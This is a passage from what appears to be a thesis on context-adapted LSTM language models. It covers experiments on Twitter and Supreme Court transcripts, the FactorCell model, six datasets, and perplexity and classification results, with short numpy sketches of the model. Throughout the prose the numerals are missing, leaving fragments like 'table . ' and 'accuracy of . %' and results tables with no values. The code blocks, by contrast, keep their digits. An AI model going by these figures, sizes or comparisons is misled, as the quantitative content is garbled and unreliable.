leagueoflegends: a pc video game
pcmasterrace: pc gaming
nfl: national football league
askwomen: questions for women
news: general news stories and discussion
worldnews: global news discussion
askmen: questions for men
gaming: general video games interest group
pics: funny or interesting pictures
videos: funny or interesting videos
funny: sharing humorous content

. . twitter experiments

the twitter evaluation was done on a set of , tweets. the language context embedding vector dimensionality was set to . when both the vocabulary and the number of contexts are small, as in this case, there is no danger of hash collisions. we disable the bloom filter, making the hash adaptation essentially equivalent to having context-dependent bias vectors. table .  reports the results of the experiments on the twitter corpus. we compute the perplexity and measure the performance of the models on a language identification task. in terms of perplexity, the best models do not make use of the multiplicative hidden layer adaptation, consistent with the results from the reddit corpus. in general, the improvement in perplexity from adaptation is small (less than %) on this corpus compared to our other experiments, where we saw relative improvements two to four times as big. this is likely because the lstm can figure out by itself which language it is modeling early on in the sequence, capture that in the hidden state, and adjust its predictions accordingly. our best model, using multiplicative adaptation of the hidden layer, achieves an accuracy of . % on this task. that is a % relative reduction in the error rate from the best model without multiplicative adaptation.
sometimes there can be little to no perplexity improvement between the unadapted and adapted models. this can be explained if the provided context variables are mostly redundant given the previous tokens in the sequence.
table . : perplexity, language identification accuracy, and f score on the twitter data for each combination of the four adaptation methods.

to investigate this further, we trained a logistic regression classifier to predict the language using the state from the lstm at the last time step of the unadapted model as a feature vector. using just labeled examples per class it is possible to get . % accuracy. furthermore, we find that a single dimension in the hidden state of the unadapted model is often enough to distinguish between different languages, even though the model was not given any supervision signal. this finding is consistent with previous work that showed that individual dimensions of lstm hidden states can be strong indicators of concepts like sentiment (karpathy et al., ; radford et al., ). figure .  visualizes the value of the dimension of the hidden layer that is the strongest indicator of spanish on three different code-switched tweets. code-switching is not a part of the training data but it provides a compelling visualization of the ability of the unsupervised model to quickly recognize the language. the fact that it is so easy for the unadapted model to pick up on the identity of the contextual variable fits with our explanation for the small relative gain in perplexity from the adapted models in these two tasks.

figure . : the value of the dimension of the lstm hidden state in an unadapted model that is the strongest indicator for spanish text, for three different code-switched tweets.

. . scotus experiments

table .  lists the results for the experiments on the scotus corpus. the sizes of the context embeddings are , , and for the case, speaker, and role variables respectively. for calculating perplexity we use a , sentence evaluation set. for the classification experiment we selected , sentences from the test data from eleven different justices and attempted to classify the identity of the justice. the perplexity of the distribution of judges over those sentences is . ( . would be uniform), so the data is roughly balanced. when classifying justices, the model is given the case context variable, but we do not make any special effort to filter candidates based on who was serving on the court during that time, i.e. all eleven justices are considered for every case.
for both the perplexity and classification metrics, the hash adaptation makes a big difference. the model that uses only hash adaptation and no hidden layer adaptation has a better perplexity than any of the model variants that use both hidden adaptation and low-rank adaptation of the output layer. to ascertain which of the context variables have the most impact, we trained additional models using different combinations of context variables. the model architecture is the one that uses all four forms of adaptation. results are listed in table . .
the most useful variable is the indicator for the case. the role variable is highly redundant; almost every speaker only appears in a single role. therefore, it is not surprising that the speaker variable is more useful to the model than the role. in table .  we list sentences generated from the fully adapted model (the same one as the last line in table . ) using beam search. the value of the context variable for the case is held fixed while we explore different values for the speaker and role variables. anecdotally, we see that the model captures some information about john roberts' role as chief justice. the model learns that justice breyer tends to start his questions with the phrase "i mean" while justice kagan tends to start with "well". roberts and kagan appear in our data both as justices and earlier as advocates.

table . : results on the scotus data in terms of perplexity and classification accuracy (acc) for the justice identification task, for each combination of the four adaptation methods.

table . : perplexities for different combinations of the case, speaker, and role context variables on the scotus corpus.

table . : sentences generated from the adapted model using beam search under different assumptions for speaker and role contexts.
roberts (justice): we'll hear argument first this morning in ayers.
breyer (justice): i mean, i don't think that's right.
kagan (justice): well, i don't think that's right.
kagan (advocate): mr. chief justice, and may it please the court:
bork (advocate): --no, i don't think so, your honor.

. comparison to related work

the multiplicative rescaling of the recurrent layer weights is used in the hypernetwork model (ha et al., ). the focus of this model is to allow the lstm to adjust automatically depending on the context of the previous words. this is different from our work in that we are adapting based on contextual information external to the word sequence. gangireddy et al. ( ) also use a rescaling of the hidden layer for adaptation, but it is done as a fine-tuning step and not during training like our model.
the rnnme model from mikolov et al. ( ) uses feature hashing to train a maximum entropy model alongside an rnn language model. the setup is similar to our method of using hashing to learn context-dependent biases. however, there are a number of differences. the motivation for the rnnme model was to speed up training of the rnn, not to compensate for the inadequacy of low-rank output layer adaptation, which had yet to be invented. furthermore, mikolov et al. ( ) do not use context dependent features in the max-ent component of the rnnme model, nor do they have a method for dealing with hash collisions such as our use of bloom filters.
the idea of having one part of a language model be low-rank and another part be an additive correction to the low-rank model has been investigated in other work (eisenstein et al., b; hutchinson et al., ; parikh et al., ). in both of these cases, the correction term is encouraged to be sparse by including an l1 penalty. our implementation did not promote sparsity in the hash adaptation features but this idea is worth further consideration.
the hybrid lstm and count based language model is an alternative way of correcting for a low-rank approximation (neubig and dyer, ). (see appendix a for a deeper look at this idea.)

. summary

while our results suggest that there is not a one-size-fits-all approach to language model adaptation, it is clear that we improve over the standard adaptation approach. the model from mikolov and zweig ( ), equivalent to using just additive adaptation on the hidden layer and low-rank adaptation of the output layer, is outperformed for all three datasets at both the language modeling and classification tasks. the combined low-rank and hash adaptation of the output layer was consistently required to get the best perplexity. for the classification tasks, the multiplicative hidden layer adaptation is clearly useful, as is the combined low-rank and hash adaptation of the output layer. importantly, there is not always a strong relationship between perplexity and classification scores. our results may have implications for work on text generation, where it can be more desirable to have more control over the generation rather than the lowest perplexity model. this issue is explored further in chapter .
our investigation of the language context in the twitter experiments gives a useful takeaway: context variables that are easily predictable from the text alone are unlikely to be helpful. more studies are needed to get a more complete understanding about what types of context variables will provide the most benefit. to that end, additional contexts are explored in subsequent chapters.
based on the results from the scotus experiments, we know that an additive transformation of the bias by itself is not always the best way to adapt the recurrent layer. this motivated us to look for a new approach that would give more consistent perplexity gains so that we could be confident recommending its use in most situations. further investigation led us to develop the factorcell model, which is the subject of the next chapter.

chapter  factorcell model

in this chapter we introduce the factorcell model for adapting the recurrent layer of an rnn language model. this is a major contribution of the thesis. instead of taking context as an additional input to the model, we conceive of adaptation in a totally new way where the model generates a custom recurrent layer for any context. this is accomplished using a low-rank decomposition in order to control the extent of parameter sharing between contexts, which is important for handling high-dimensional, sparse contexts. the experiments in this chapter will show that the factorcell improves perplexity and that it also has qualitative differences that set it apart from other models.
the factorcell model generalizes the concatcell and remedies one of its major weaknesses. when there is a large amount of data available per context then there is less need to share information between contexts. likewise, where there are many contexts and less training data per context it is better to do more parameter sharing. the concatcell is not able to trade off between these scenarios. it always shares almost all of its parameters across contexts. in contrast, the factorcell rank hyperparameter allows complete control over how much sharing there is between contexts.
aside from perplexity, computation cost is always a consideration. a reliable and easy way to reduce perplexity is to increase the recurrent layer dimension.
in latency-constrained applications (most industry speech recognition systems have strict latency constraints), the recurrent state dimension is limited. by design, the factorcell permits pre-computation and caching so that its overall computational cost is only negligibly more than that of the much simpler concatcell. all of the benefits of the additional adaptation are delivered with no extra latency. this chapter draws on content from some of our previously published work (jaech and ostendorf, a). the factorcell is an alternative to the multiplicative transform explored in chapter ; it has the advantage of dedicating more parameters to the adaptation and of effecting a bigger change on the recurrent layer weights. unlike the multiplicative transform, we find that the factorcell model consistently improves perplexity.

. factorcell model

our model uses adaptation in both the recurrent layer and the bias vector of the output layer. in this section we describe methods for adapting the recurrent layer and the softmax layer, showing that our proposed model is a generalization of most prior methods.

. . adapting the recurrent layer

our proposed model extends the concatcell by using a context-dependent weight matrix w′ = w + a in place of the generic weight matrix w. (we refer to w as generic because it is shared across all context settings.) the adaptation matrix a is generated by taking the product of the context embedding vector against a set of left and right basis tensors to produce a rank-r matrix. the left and right adaptation basis tensors are given as z_l ∈ ℝ^(k×(p+q)×r) and z_r ∈ ℝ^(r×q×k). the two basis tensors together can be thought of as holding k different rank-r matrices, a_j = z_{l,j} z_{r,j}, each the size of w. by taking the product of c with the corresponding tensor modes of z_l and z_r (using ×_i to denote the mode-i tensor product, i.e., the product with the i-th dimension of the tensor), the context determines the weighted combination of the k matrices:

a = (c × z_l)(z_r × cᵀ). ( . )

(figure . is a visualization of the factorcell architecture.) the number of degrees of freedom of a is controlled by the dimension k of the context vector and the rank r of the k weight matrices. the rank is treated as a hyperparameter and controls the extent to which the model relies on the generic weight matrix w versus behaving in a more context-specific manner.

figure . : illustration of the factorcell architecture.

we call this model the factorcell because the weight matrix has been adapted by adding a factored component. the concatcell model is a special case of the factorcell where z_l and z_r are set to zero. in summary, the proposed model is given by:

h_t = σ(w′ [e_{w_t}, h_{t−1}] + b′)
w′ = w + (c × z_l)(z_r × c)
b′ = qc + b. ( . )

if the context is known in advance, w′ can be precomputed, in which case applying the rnn at test time requires no more computation than using an unadapted rnn of the same size. this means that for a fixed-size recurrent layer, the factorcell model can have many more parameters than the concatcell model with hardly any increase in computational cost. when adapting with the factorcell method, we find it necessary to also include the shift of the bias in the softmax output as described in equation . .

. . lstm factorcell equations

only trivial changes are needed to use the factorcell method on an lstm instead of a vanilla rnn. here, we list the equations for an lstm with coupled input and forget gates, which is what was used in our experiments. the weight matrix w from equation .
is now size 3q × (p + q) and b is dimension 3q, where 3 is the number of gates. likewise, z_r from equation . is made to be of size r × 3q × k. the weight matrix w′ is as defined in equation . and, after computing its product with the input [e_{w_t}, h_{t−1}], the result is split into three vectors of equal size, i_t, f_t, and o_t:

[i_t, f_t, o_t] = w′ [e_{w_t}, h_{t−1}] + b, ( . )

which are used in the input gate, the forget gate, and the output gate, respectively. using these three vectors we perform the gating operations to compute h_t using the memory cell m_t as follows:

f_t ← sigmoid(f_t + . )
m_t = m_{t−1} ⊙ f_t + (1 − f_t) ⊙ tanh(i_t)
h_t = tanh(m_t) ⊙ sigmoid(o_t) ( . )

note that equation . , which shows that a context vector concatenated with the input is equivalent to an additive bias term, extends to equation . . in other words, in the lstm version of the concatcell model, the context vector effectively introduces an extra bias term for each of the three gates.

. data

name train dev test vocab docs. context
agnews . m . m . m , k newspaper sections
dbpedia . m . m . m , k entity categories
tripadvisor . m . m . m , k . k hotels / sentiment
yelp . m . m . m , k sentiment
eurotwitter∗ . m . m . m k languages
geotwitter∗ . m . m . m k latitude & longitude
table . : dataset statistics: dataset size in words (* or characters) of the train, dev, and test sets, vocabulary size, number of training documents, and context variables.

the experiments make use of six datasets: four targeting word-level sequences, and two targeting character sequences. the character studies are motivated by the growing interest in character-level models in both speech recognition and machine translation (hannun et al., ; chung et al., ). by using multiple datasets with different types of context, we hope to learn more about what makes a dataset amenable to adaptation. the datasets range in size from over million words of training data to million characters of training data for the smallest one. when using a word-based vocabulary, we preprocess the data by lowercasing, tokenizing, and removing most punctuation. we also truncate sentences to be shorter than a maximum length of words for agnews and dbpedia and to tokens for the remaining datasets. summary information is provided in table . , including the training, development, and test data sizes in terms of number of tokens, the vocabulary size, the number of training documents (i.e., context samples), and the context variables (f :n). the largest dataset, tripadvisor, has over thousand hotel review documents, which adds up to over million words of training data. the first three datasets (agnews, dbpedia, and yelp) have previously been used for text classification (zhang et al., ). these consist of newspaper headlines, encyclopedia entries, and restaurant and business reviews, respectively. the context variables associated with these correspond to the newspaper section (world, sports, business, sci & tech) for each headline, the page category on dbpedia (out of options such as actor, athlete, building, etc.), and the star rating on yelp (from one to five). for agnews, dbpedia, and yelp we use the same test data as in previous work. our fourth dataset, from tripadvisor, was previously used for language modeling and consists of two relevant context variables: an identifier for the hotel and a sentiment score from one to five stars (tang et al., ). some of the reviews are written in french or german but most are in english.
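returning briefly to the model definition, the factorcell computation in equations . and . can be made concrete with a short numpy sketch. the dimensions, the forget-gate bias constant, and all variable names below are illustrative assumptions rather than values or code from our implementation.

import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

# illustrative toy dimensions (assumptions, not the values used in the experiments)
p, q, k, r = 8, 16, 5, 3          # word embedding, hidden state, context, rank
num_gates = 3                      # i, f, o with coupled input/forget gates

rng = np.random.default_rng(0)
W  = rng.normal(scale=0.1, size=(p + q, num_gates * q))   # generic weight matrix
b  = np.zeros(num_gates * q)
ZL = rng.normal(scale=0.1, size=(k, p + q, r))             # left basis tensor
ZR = rng.normal(scale=0.1, size=(r, num_gates * q, k))     # right basis tensor

def adapted_weights(c):
    """w' = w + (c x zl)(zr x c): a context-weighted sum of k rank-r matrices."""
    left  = np.einsum('k,kir->ir', c, ZL)     # (p+q) x r
    right = np.einsum('rjk,k->rj', ZR, c)     # r x (num_gates * q)
    return W + left @ right                    # can be precomputed once per context

def factorcell_lstm_step(x, h_prev, m_prev, W_adapted, forget_bias=1.0):
    """one lstm step with coupled input/forget gates (forget_bias is an assumed constant)."""
    i, f, o = np.split(np.concatenate([x, h_prev]) @ W_adapted + b, num_gates)
    f = sigmoid(f + forget_bias)
    m = m_prev * f + (1.0 - f) * np.tanh(i)   # coupled gates: input weight is 1 - f
    h = np.tanh(m) * sigmoid(o)
    return h, m

c = rng.normal(size=k)                         # context embedding
Wc = adapted_weights(c)                        # cached for the whole sequence
h, m = factorcell_lstm_step(rng.normal(size=p), np.zeros(q), np.zeros(q), Wc)

since w′ depends only on c, it is computed once per context and reused at every time step, which is what keeps the test-time cost close to that of the concatcell.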
there are , different hotels but we group all the ones that do not occur at least times in the training data into a single entity, leaving us with around , . these four datasets use word-based vocabularies. we also experiment on two twitter datasets: eurotwitter and geotwitter. eurotwitter is the same as the twitter data used in the previous chapter and consists of thousand tweets labeled with one of nine languages: (english, spanish, galician, catalan, basque, portuguese, french, german, and italian). the corpus was created by combining portions of multiple published datasets for language identification including twitter (jaech et al., ), tweetlid (zubiaga et al., ), and the monolingual portion of tweets from a code- switching detection workshop (molina et al., ). the geotwitter data contains tweets with latitude and longitude information from england, spain, and the united states. the latitude and longitude coordinates are given as numerical inputs. this is different from the other five datasets that all use categorical context variables. . experiments with different contexts the goal of the experiments is to show that the factorcell model can deliver improved performance over current approaches for multiple language model applications and a variety of types of contexts. specifically, results are reported for context-conditioned perplexity and generative model text classification accuracy, using contexts that capture a range of phenomena and dimensionalities. test set perplexity is the most widely accepted method for evaluating language models, both for use in recognition/translation applications and generation. it has the advantage that it is easy to measure and is widely used as a criterion for model fit, but the limitation that it is not directly matched to most tasks that language models are directly used for. text classification using the model in a generative classifier is a simple application of bayes rule: ω̂ = arg max ω p(w :t |ω)p(ω) ( . ) where w :t is the text sequence, p(ω) is the class prior, which we assume to be uniform. classification accuracy provides additional information about the power of a model, even if it is not being designed explicitly for text classification. further, it allows us to be able to directly compare our model performance against previously published text classification data was accessed from http://followthehashtag.com. benchmarks. although the most effective models for text classification have generally been discriminative, generative models can be competitive when the available training data is small or text samples are short (yogatama et al., ), and we find that the factorcell makes the generative model more competitive. note that the use of classification accuracy for evaluation here involves counting errors associated with applying the generative model to independent test samples. this differs from the accuracy criterion used for evaluating context-sensitive language models for text generation based on a separate discriminative classifier trained on generated text (ficler and goldberg, ; hu et al., ). we discuss this further in section . and chapter . the experiments compare the factorcell model (equations . and . ) to two popular alternatives, which we refer to as concatcell (equations . and . ) and softmaxbias (equa- tion . ). as noted earlier, the softmaxbias method is a simplification of the concatcell model, which is in turn a simplification of the factorcell model. 
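as a hedged sketch of the generative classifier in equation . , one can score the held-out sequence under each candidate context value and take the argmax (the prior is uniform and drops out). here, sequence_log_prob is a stand-in for scoring a token sequence with the adapted language model, not a function from our code, and the toy scorer is purely illustrative.

import math

def classify(tokens, context_values, sequence_log_prob):
    """pick the context maximizing log p(w_{1:T} | context); uniform prior drops out."""
    scores = {c: sequence_log_prob(tokens, c) for c in context_values}
    return max(scores, key=scores.get)

# toy stand-in scorer: a unigram table per context (illustration only)
toy_tables = {
    "1_star": {"terrible": 0.3, "food": 0.2},
    "5_star": {"amazing": 0.3, "food": 0.2},
}
def toy_log_prob(tokens, context, floor=1e-4):
    return sum(math.log(toy_tables[context].get(t, floor)) for t in tokens)

print(classify(["amazing", "food"], list(toy_tables), toy_log_prob))  # -> 5_star
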
the softmaxbias method impacts only the output layer and thus only unigram statistics. since bag-of-word models provide strong baselines in many text classification tasks, we hypothesize that the soft- maxbias model will capture much of the relative improvement over the unadapted model for word-based tasks. however, in small vocabulary character-based models, the unigram dis- tribution is unlikely to carry much information about the context, so adapting the recurrent layer should become more important in character-level models. we expect that performance gains will be greatest for the factorcell model for sources that have sufficient structure and data to support learning the extra degrees of freedom. another possible baseline would use models independently trained on the subset of data for each context. this is the “independent component” case in (yogatama et al., ). this will fail when a context variable takes on many values (or continuous values) or when training data is limited, because it makes poor use of the training data, as shown in that study. while we do have some datasets where this approach is plausible, we feel that its limitations have been clearly established. . . implementation details the rnn variant that we use is an lstm with coupled input and forget gates (melis et al., ). the different model variants are implemented using the tensorflow library. the model is trained with the standard negative log likelihood loss function, i.e. minimizing cross entropy. dropout was used as a regularizer in the recurrent connections (semeniuta et al., ). training is done using the adam optimizer with a learning rate of . . for the models with word-based vocabularies, a sampled softmax loss is used with a unigram proposal distribution and sampling words at each time-step (jean et al., ). the classification experiments use a sampled softmax loss with a sample size of , words. this is an order of magnitude faster to compute with a minimal effect on accuracy. agnews dbpedia eurotwtr geotwtr trip yelp word embed - - - lstm dim - steps . - . k . - . k . - . k . - . k . - . k . - . k dropout . . . - . . - . . - . . ctx. embed - - - - rank table . : selected hyperparameters for each dataset. when a range is listed it means that a different values were selected for the factorcell, concatcell, softmaxbias or unadapted models. hyperparameter tuning was done based on minimizing perplexity on the development set and using a random search. hyperparameters included word embedding size e, recurrent state size d, context embedding size k, and weight adaptation matrix rank r, the number of training steps, recurrent dropout probability, and random initialization seed. we conducted more than tuning experiments with iterative refinements. the number of experiments code available at http://github.com/ajaech/calm. per dataset vaires between and . the selected hyperparameter values are listed in table . . for any fixed lstm size, the factorcell has a higher count of learned parameters compared to the concatcell. however, during evaluation both models use approximately the same number of floating-point operations because w′ only needs to be computed once per sentence. because of this, we believe limiting the recurrent layer cell size is a fair way to compare between the factorcell and the concatcell. . . word-based models agnews dbpedia tripadvisor yelp model ppl acc ppl acc ppl acc ppl acc unadapted . – . – . – . – softmaxbias . . . . . . . . concatcell . . . . . . . . factorcell . . . . . . . . table . 
: perplexity and classification accuracy on the test set for the four word-based datasets. perplexities and classification accuracies for the four word-based datasets are presented in table . . in each of the four datasets, the factorcell model gives the best perplexity. for classification accuracy, there is a bigger difference between the models, and the factorcell model is the most accurate on three out of four datasets and tied with the softmaxbias model on agnews. for dbpedia and tripadvisor, most of the improvement in perplexity relative to the unadapted case is achieved by the softmaxbias model with smaller relative improvements coming from the increased power of the concatcell and factorcell models. for yelp, the perplexity improvements are small; the factorcell model is just . % better than the unadapted model. from (yogatama et al., ), we see that for agnews, much more so than for other datasets, the unigram statistics capture the discriminating information, and it is the only dataset in that work where a naive bayes classifier is competitive with the generative lstm for the full range of training data. the fact that the softmaxbias model gets the same accuracy as the factorcell model on this task suggests that topic context may benefit less from adapting the recurrent layer. for the dbpedia and yelp datasets, the factorcell model beats previously reported classification accuracies for generative models (yogatama et al., ). however, it is not competitive with state-of-the-art discriminative models on these tasks with the full training set. with less training data, it probably would be, based on the results in (yogatama et al., ). the numbers in table . do not adequately convey the fact that there are hyperparame- ters with an effect on perplexity that is greater than the sometimes small relative differences between models. even the seed for the random weight initialization can have a “major im- pact” on the final performance of an lstm (reimers and gurevych, ). we use figure . to show how the three classes of models perform across a range of hyperparameters. the figure compares perplexity on the x-axis with accuracy on the y-axis with both metrics computed on the development set. each point in this figure represents a different instance of the model trained with random hyperparameter settings and the best results are in the upper right corner of each plot. the color/shape differences of the points correspond to the three classes of models: factorcell, concatcell, and softmaxbias. within the same model class but across different hyperparameter settings, there is much more variation in perplexity than in accuracy. the lstm cell size is mainly responsible for this; it has a much bigger impact on perplexity than on accuracy. it is also apparent that the models with the lowest perplexity are not always the ones with the highest accuracy. notably, improvements in perplexity are associated with a decrease in accuracy for the softmaxbias models on the dbpedia, tripadvisor, and yelp datasets. in bowman et al. ( ), it was observed that the more powerful the decoder of a variational auto-encoder was the more likely it was to ignore the prior information given by the encoder. a similar effect figure . : accuracy vs. perplexity for different classes of models on the four word-based datasets. is happening here where when the recurrent layer size is increased then the model relies less on the unigram prior provided by the adapted softmax bias vector. see section . . 
for further hyperparameter analysis. figure . is a visualization of the per-word log likelihood ratios between a model as- suming a star review and the same model assuming a star review. likelihoods were computed using an ensemble of three models to reduce variance. the analysis is repeated for each class of model. words highlighted in blue are given a higher likelihood under the star assumption. unigrams with strong sentiment such as “lovely” and “friendly” are well-represented by all three models. the reader may not consider the tokens “craziness” or “ - pm” to be strong indicators of a positive review but the way they are used in this review is representative of how they are typically used across the corpus. as expected, the concatcell and factorcell model capture the sentiment of multi-token phrases. as an example, the unigram “enough” is % more likely to occur in a star review than in a star review. however, “do enough” is times more likely to appear in a star review than in a star review. in this example, the factorcell model does a better job of handling the word “enough.” . . character-based models next, we evaluate the eurotwitter and geotwitter models using both perplexity and a classification task. for eurotwitter, the classification task is to identify the language. with geotwitter, it is less obvious what the classification task should be because the context values are continuous and not categorical. we selected six cities and then assigned each sentence the label of the closest city in that list while still retaining the exact coordinates of the tweet. there are two cities from each country: manchester, london, madrid, barcelona, new york city, and los angeles. tweets from locations further than km from the nearest city in the list were discarded when evaluating the classification accuracy. the classification task is sufficient to investigate the properties of the language model but, unlike some prior work, it is not designed to capture geographic lexical variations in an easily interpretable manner (eisenstein et al., ) nor is it designed to be efficient at geolocation (han et al., ). perplexities and classification accuracies are presented in table . . the factorcell model has the lowest perplexity and the highest accuracy for both datasets. again, the factorcell model clearly improves on the concatcell as measured by classification accuracy. consistent with our hypothesis, adapting the softmax bias is not effective for these small vocabulary character-based tasks. the softmaxbias model has small perplexity improvements (< %) and low classification accuracies. figure . compares perplexity and classification accuracy for different hyperparameter settings of the character-based models. again, we see that it is possible to trade-off some softmaxbias concatcell factorcell figure . : log likelihood ratio between a model that assumes a star review and the same model that assumes a star review. blue indicates a higher star likelihood and red is a higher likelihood for the star condition. eurotwitter geotwitter model ppl acc ppl acc unadapted . – . – softmaxbias . . . . concatcell . . . . factorcell . . . . table . : perplexity and classification accuracies for the eurotwitter and geotwitter datasets. perplexity for gains in classification accuracy. for eurotwitter, if tuning is done on accuracy rather than perplexity then the accuracy of the best model is as high as %. . . hyperparameter analysis the hyperparameter with the strongest effect on perplexity is the size of the lstm. 
this was consistent across all six datasets. the effect on classification accuracy of increasing the lstm size was mixed. increasing the context embedding size generally helped with accuracy on all datasets, but it had a more neutral effect on tripadvisor and yelp and increased perplexity on the two character-based datasets. for the factorcell model, increasing the rank of the adaptation matrix tended to lead to increased classification accuracy on all datasets and seemed to help with perplexity on agnews, dbpedia, and tripadvisor. figure . compares the effect on perplexity of the lstm parameter count and the fac- torcell rank hyperparameters. each point in those plots represents a separate instance of the model with varied hyperparameters. in the right subplot of figure . , we see that increasing the rank hyperparameter improves perplexity. this is consistent with our hypothesis that increasing the rank can let the model adapt more. the variance is large because differences in other hyperparameters (such as hidden state size) also have an impact. in the left subplot we compare the performance of the factorcell with the concatcell as figure . : accuracy vs. perplexity for different classes of models on the two character-based datasets. the size of the word embeddings and recurrent state change. the x-axis is the size of the w recurrent weight matrix, specifically (e + d)d for an lstm with gates. since the adapted weights can be precomputed, the computational cost is roughly the same for points with the same x-value. for a fixed-size hidden state, the factorcell model has a better perplexity than the concatcell. since performance can be improved both by increasing the recurrent state dimension and/or by increasing rank, we examined the relative benefits of each. the perplexity of a factorcell model with an lstm size of k will improve by % when the rank is increased from to . to get the same decrease in perplexity by changing the size of the hidden state would require k parameters, resulting in a significant computational advantage for the factorcell model. using a one-hot vector for adapting the softmax bias layer in place of the context em- bedding when adapting the softmax bias vector tended to have a large positive effect on accuracy leaving perplexity mostly unchanged. recall from section . that if the number of values that a context variable can take on is small then we can allow the model to choose between using the low-dimensional context embedding or a one-hot vector. this option is figure . : comparison of the effect of lstm parameter count and factorcell rank hyper- parameters on perplexity for dbpedia. not available for the tripadvisor and the geotwitter datasets because the dimensionality of their one-hot vectors would be too large. the method of adapting the softmax bias is the main explanation for why some concatcell models performed significantly above/below the trendline for dbpedia in figure . . we experimented with an additional hyperparameter on the yelp dataset, namely the inclusion of layer normalization (ba et al., ). (we had ruled-out using layer normaliza- tion in preliminary work on the agnews data before we understood that agnews is not representative, so only one task was explored here.) layer normalization significantly helped the perplexity on yelp (≈ % relative improvement) and all of the top-performing models on the held-out development data had it enabled. . 
analysis for sparse contexts the tripadvisor data is an interesting case because the original context space is high di- mensional ( hotels × user ratings) and sparse. since the model applies end-to-end learning, we can investigate what the context embeddings learn. in particular, we looked at location (hotels are from cities in the united states) and class of hotel, neither of which another option for the tripadvisor data is to use the hashing method from section . . . are input to the model. all of what it learns about these concepts come from extracting information from the text of the reviews. to visualize the embedding, we used a -dimensional principal component analysis (pca) projection of the embeddings of the hotels. we found that the model learns to group the hotels based on geographic region; the projected embeddings for the largest cities are shown in figure . , plotting the . σ ellipsoid of the gaussian distribution of the points. (actual points are not shown to avoid clutter.) not only are hotels from the same city grouped together, cities that are close geographically appear close to each other in the embedding space. cities in the southwest appear on the left of the figure, the west coast is on top and the east coast and midwest is on the right side. this is likely due in part to the impact of the region on activities that guests may mention, but there also appears to be a geographic sampling bias in the hotel class that may impact language use. figure . shows the projected hotel embeddings in the same space as figure . except that the points are now colored based on the hotel class. class is a rating from an independent agency that indicates the level of service and amenities that customers can expect to receive at a hotel. whereas, the star rating is the average score given to each establishment by the customers who reviewed it. hotel class does not determine star rating although they are correlated (r = . ). the dataset does not contain a uniform sample of hotel classes from each city. the hotels included from boston, chicago, and philly are almost exclusively high class and the ones from l.a. and san diego happen to be low class, so the embedding distributions also reflect hotel class: lower class hotels towards the top left and higher class hotels towards the bottom right. the visualization for the concatcell and softmaxbias models are similar. another way of understanding what the context embeddings represent is to compute the softmax bias projection gc and examine the words that experience the biggest increase in probability. we show three examples in table . . in each case, the top words are strongly related to geography and include names of neighborhoods, local attractions, and other hotels in the same city. the top boosted words are relatively unaffected by changing the rating. figure . : distribution of a pca projection of hotel embeddings from the tripadvisor factorcell model showing the grouping of the hotels by city. figure . : distribution of a pca projection of the hotel embeddings from the tripadvisor factorcell model showing the grouping of hotels by class. (recall that the hotel identifier and the user rating are the only two inputs used to create the context embedding.) this table combined with the other visualizations indicates that location effects tend to dominate in the output layer, which may explain why the two models adapting the recurrent network seem to have a bigger impact on classification performance. 
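this analysis can be sketched in a few lines: compute the bias shift gc for a chosen context embedding and list the vocabulary items with the largest positive shift. the names below are illustrative and the numbers are random stand-ins rather than values from the trained model.

import numpy as np

def top_boosted_words(G, c, vocab, n=10):
    """words whose output-layer bias increases most under context embedding c (shift = G @ c)."""
    shift = G @ c
    order = np.argsort(-shift)[:n]
    return [(vocab[i], float(shift[i])) for i in order]

# toy usage with random numbers purely for illustration
rng = np.random.default_rng(0)
vocab = ["seattle", "pike", "chicago", "hollywood", "hotel", "room"]
G = rng.normal(size=(len(vocab), 4))   # softmax-bias projection matrix
c = rng.normal(size=4)                 # context embedding for one (hotel, rating) pair
print(top_boosted_words(G, c, vocab, n=3))
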
hotel city class rating top boosted words amalfi chicago . amalfi, chicago, allegro, burnham, sable, michigan, acme, conrad, tal- bott, wrigley blvd hotel suites los angeles . hollywood, kodak, highland, univer- sal, reseda, griffith, grauman’s, bev- erly, ventura four points sheraton seattle . seattle, pike, watertown, deca, nee- dle, pikes, pike’s monorail, uw, safeco table . : the top boosted words in the softmax bias layer for different context settings in a factorcell model. . comparison to related work the studies that most directly relate to our work are neural models that correspond to special cases of the more general factorcell model, including those that leverage what we call the softmaxbias model (dieng et al., ; tang et al., ; yogatama et al., ; ficler and goldberg, ) and others that use the concatcell approach (mikolov and zweig, ; wen et al., ; chen et al., ; ghosh et al., ). the factorcell model is distinguished by having an additive (factored) context-dependent transformation of the recurrent layer weight matrix. a related additive context-dependent transformation has been proposed for log-bilinear sequence models (eisenstein et al., a; hutchinson et al., ), but these are less powerful than the rnn. factored tensors have been successfully used in other nlp applications such as dependency parsing (lei et al., ). a somewhat different use of low-rank factorization has previously been used to reduce the parameter count in an lstm lm (kuchaiev and ginsburg, ), finding that the reduced number of parameters leads to faster training. much of the work on context-adaptive neural language models has focused on incorpo- rating document or topic information (mikolov and zweig, ; ji et al., ; ghosh et al., ; dieng et al., ), where context is defined in terms of word or n-gram statistics. our work differs from these studies in that the context is defined by a variety of sources, including discrete and/or continuous metadata, which is mapped to a context vector in end-to-end training. context-sensitive language models for text generation tend to involve other forms of context similar to the objective of our work, including speaker characteristics (luan et al., ; li et al., ), dialog act (wen et al., ), sentiment and other fac- tors (tang et al., ; hu et al., ), and style (ficler and goldberg, ). our work is distinctive in assessing performance over a broad variety of context variables. . summary in summary, this chapter has introduced a new model for adapting (or controlling) a lan- guage model depending on contextual metadata. the factorcell model extends prior work with context-dependent rnns by using the context vector to generate a low-rank, factored, additive transformation of the recurrent cell weight matrix. experiments with six tasks show that the factorcell model matches or exceeds performance of alternative methods in both perplexity and text classification accuracy. findings hold for a variety of types of context, including high-dimensional contexts, and the adaptation of the recurrent layer is particularly important for character-level models. for many contexts, the benefit of the factorcell model comes with essentially no additional computational cost at test time, since the transforma- tions can be pre-computed. analyses of a dataset with a high-dimensional sparse context vector show that the model learns context similarities to facilitate parameter sharing. an adapted language model needs to memorize information about the unique language patterns of each context. 
